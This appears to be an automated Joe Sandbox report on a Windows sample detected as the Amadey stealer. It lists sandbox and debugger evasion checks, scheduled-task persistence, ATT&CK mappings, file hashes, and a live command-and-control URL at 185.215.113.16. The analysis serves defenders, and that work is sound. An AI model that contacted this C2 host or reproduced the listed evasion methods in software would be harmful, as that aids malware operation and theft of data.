                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04BA0816 Start: 04BA0B14 End: 04BA082D0_2_04BA0816
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04BA02BB rdtsc 0_2_04BA02BB
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002E645B mov eax, dword ptr fs:[00000030h]6_2_002E645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002EA1C2 mov eax, dword ptr fs:[00000030h]6_2_002EA1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: $Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002CD312 cpuid 6_2_002CD312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002CCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_002CCB1A

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 0.2.file.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.axplong.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.axplong.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000003.1755618042.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1726972956.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1759465892.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1799745219.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2268716495.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767879458.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1795993129.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory741
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519551 Sample: file.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 23 15.164.165.52.in-addr.arpa 2->23 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Antivirus detection for URL or domain 2->39 41 7 other signatures 2->41 7 file.exe 5 2->7         started        11 axplong.exe 12 2->11         started        14 axplong.exe 2->14         started        signatures3 process4 dnsIp5 19 C:\Users\user\AppData\Local\...\axplong.exe, PE32 7->19 dropped 21 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 7->21 dropped 43 Detected unpacking (changes PE section rights) 7->43 45 Tries to evade debugger and weak emulator (self modifying code) 7->45 47 Tries to detect virtualization through RDTSC time measurements 7->47 49 Potentially malicious time measurement code found 7->49 16 axplong.exe 7->16         started        25 185.215.113.16, 55650, 55651, 55652 WHOLESALECONNECTIONSNL Portugal 11->25 51 Hides threads from debuggers 11->51 53 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->53 55 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->55 file6 signatures7 process8 signatures9 27 Antivirus detection for dropped file 16->27 29 Multi AV Scanner detection for dropped file 16->29 31 Detected unpacking (changes PE section rights) 16->31 33 7 other signatures 16->33

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe53%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%ReversingLabsWin32.Packed.Themida

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.phpY100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpJ100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpD100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                    http://185.215.113.16/Jo89Ku7d/index.phpI100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpz100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php=100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpE100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpX100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedV100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpq100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php/100%Avira URL Cloudmalware
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedn100%Avira URL Cloudphishing

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    15.164.165.52.in-addr.arpa
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.phptrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.phpJaxplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpIaxplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpiaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2980255678.0000000000E68000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpEaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpDaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.php=axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpzaxplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpYaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpyaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpXaxplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpncodedVaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpqaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.php/axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpncodednaxplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.16
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519551
                          Start date and time:2024-09-26 17:04:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target axplong.exe, PID 5064 because there are no executed function
                          • Execution Graph export aborted for target axplong.exe, PID 6020 because there are no executed function
                          • Execution Graph export aborted for target file.exe, PID 6692 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          11:06:01API Interceptor478630x Sleep call for process: axplong.exe modified
                          16:05:08Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php
                          file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                          • 185.215.113.16/inc/newbundle2.exe
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.16/Jo89Ku7d/index.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousPhorpiexBrowse
                          • 185.215.113.66
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.103
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                          • 185.215.113.117

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1913344
                          Entropy (8bit):7.950396173130341
                          Encrypted:false
                          SSDEEP:49152:hskp+qQXcNF9BMop9cdXcAB+ZetEWzf23Qfu24G:mkp+qQsNFMhfSWL5G24
                          MD5:EE97C42201B1BF6C1B166B5EF8EE88B0
                          SHA1:EB6894654E6C48E98D4CF16D47073BFE9CCFDDC8
                          SHA-256:9E595C5513BA6EDDE325DC5DADB184A977C6E89EF0A3230212628B100A1ABA4C
                          SHA-512:1A152F6BB5F92A91B2B0CA6BB17066619B8358408EACA2934E32413371F081B3E6F323CDB63AE5030F379A68CEEDCA12BACF9C7BC3A542A404E49A197C7F9510
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 53%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................K......;....@.................................W...k...........................t.K.............................$.K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...mtnloani. ....1.....................@...bcuuovzp......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Windows\Tasks\axplong.job

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):286
                          Entropy (8bit):3.408377949345087
                          Encrypted:false
                          SSDEEP:6:v4LVXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lb2dt0:SpRKQ1lOmeeDHjzvYRQVqt0
                          MD5:9148677647D928CDED564D1926719378
                          SHA1:66445A1280CAE4EBC19AF7113660584F0D92FE40
                          SHA-256:DF53BB8D26AA07CF1207514CA52190AE6D3C47E8F20D33371E7FB3C8A80E9F9B
                          SHA-512:8F69B3337D27910AE1BB0D53C0F8F0F8F2BE5FF1482514849917667EF8E65F825CD1DCBAB2FC7CAF49D4AE41F8531FCE63F5955C0670B2D6F6490FAF7F1F055B
                          Malicious:false
                          Reputation:low
                          Preview:....`2n..!.N.!F.t4E.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.950396173130341
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'913'344 bytes
                          MD5:ee97c42201b1bf6c1b166b5ef8ee88b0
                          SHA1:eb6894654e6c48e98d4cf16d47073bfe9ccfddc8
                          SHA256:9e595c5513ba6edde325dc5dadb184a977c6e89ef0a3230212628b100a1aba4c
                          SHA512:1a152f6bb5f92a91b2b0ca6bb17066619b8358408eaca2934e32413371f081b3e6f323cdb63ae5030f379a68ceedca12bacf9c7bc3a542a404e49a197c7f9510
                          SSDEEP:49152:hskp+qQXcNF9BMop9cdXcAB+ZetEWzf23Qfu24G:mkp+qQsNFMhfSWL5G24
                          TLSH:2395332DB4E1EB9FD9DF12F6DA8793C45F98762A44C34D0932461125868F8A0B6F7F80
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0x8bb000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F488CB7B7FAh
                          movups xmm3, dqword ptr [00000000h]
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+0Ah], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          pop es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edi], cl
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or al, 80h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          sbb al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax+00000000h], eax
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b94740x10mtnloani
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x4b94240x18mtnloani
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
